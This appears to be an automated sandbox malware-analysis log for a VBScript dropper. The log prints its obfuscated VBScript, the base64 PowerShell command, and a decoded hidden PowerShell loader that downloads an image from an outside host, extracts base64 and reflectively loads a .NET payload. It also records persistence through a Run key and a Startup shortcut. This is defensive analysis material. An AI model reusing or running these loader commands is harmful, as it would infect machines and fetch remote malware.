Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: textshaping.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Source: RegSvcs.lnk.11.dr

LNK file: ..\..\..\..\..\RegSvcs.exe

Source: C:\Windows\System32\wscript.exe	Automated click: OK
Source: C:\Windows\System32\wscript.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

VBScript performs obfuscated calls to suspicious functions

Source:	Binary string: RegSvcs.pdb, source: RegSvcs.exe.11.dr
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe.11.dr

Data Obfuscation

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.Network");IWshNetwork2.AddWindowsPrinterConnection("\\SRVHOMOLOGDC1\Brother", "Brother");IWshNetwork2.AddWindowsPrinterConnection("\\SRVHOMOLOGDC1\HP", "HP");IWshNetwork2.MapNetworkDrive("P:", "\\SRVHOMOLOGDC1\Publica", "true");IWshNetwork2.MapNetworkDrive("E:", "\\SRVHOMOLOGDC1\Digitalizacoes", "true");IHost.CreateObject("WScript.Shell");IWshShell3.SpecialFolders("Desktop");IWshShell3.CreateShortcut("C:\Users\user\Desktop\RD Web Access.lnk");IWshShortcut.TargetPath("http://app01.system.com.br/RDWeb/Pages/login.aspx");IWshShortcut.IconLocation("\\SRVHOMOLOGDC1\Icones\favicon.ico");IWshShell3.SpecialFolders("Desktop");IWshShell3.CreateShortcut("C:\Users\user\Desktop\Pasta_do_Departamento.lnk");IWshShortcut.TargetPath("S:\");IWshShortcut.WindowStyle("1");IWshShortcut.Description("Pasta_do_Departamento");IWshShell3.SpecialFolders("Desktop");IWshShell3.CreateShortcut("C:\Users\user\Desktop\Pasta_Publica.lnk");IWshShortcut.TargetPath("P:\");IWshShortcut.WindowStyle("1");IWshShortcut.Description("Pasta_Publica");IWshShell3.SendKeys("{F5}");IServerXMLHTTPRequest2.open("GET", "https://pastebin.com/raw/8RAqVdhv", "false");IServerXMLHTTPRequest2.send(); dim inaudito , phlebomalacia , abusivamente , endurentar , liminarca , Cama , liminarca1 phlebomalacia = " " abusivamente = "" & endurentar & phlebomalacia & endurentar & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & endurentar & phlebomalacia & endurentar & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & endurentar & phlebomalacia & endurentar & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & endurentar & phlebomalacia & endurentar & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & endurentar & phlebomalacia & endurentar & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & endurentar & phlebomalacia & endurentar & "QBuDgTreHQDgTreOwDgTregDgTreCQDgTre" & endurentar & phlebomalacia & endurentar & "DgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTre" & endurentar & phlebomalacia & endurentar & "DgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTre" & endurentar & phlebomalacia & endurentar & "gBsDgTreGUDgTre" & endurentar & phlebomalacia & endurentar & "DgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTre" & endurentar & phlebomalacia & endurentar & "gBvDgTreHIDgTre"

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: $codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTre

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'C:\ProgramData\' , 'moquenqueiro','RegSvcs',''))} }"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'C:\ProgramData\' , 'moquenqueiro','RegSvcs',''))} }"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_00007FFD348C00BD pushad ; iretd

5_2_00007FFD348C00C1

Persistence and Installation Behavior

Command shell drops VBS files

Source: C:\Windows\System32\cmd.exe

File created: C:\ProgramData\moquenqueiro.vbs

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File created: C:\Users\user\AppData\Roaming\RegSvcs.exe

Jump to dropped file

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\moquenqueiro.vbs

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RegSvcs.lnk

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RegSvcs.lnk

Potential evasive JS / VBS script found (domain check)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
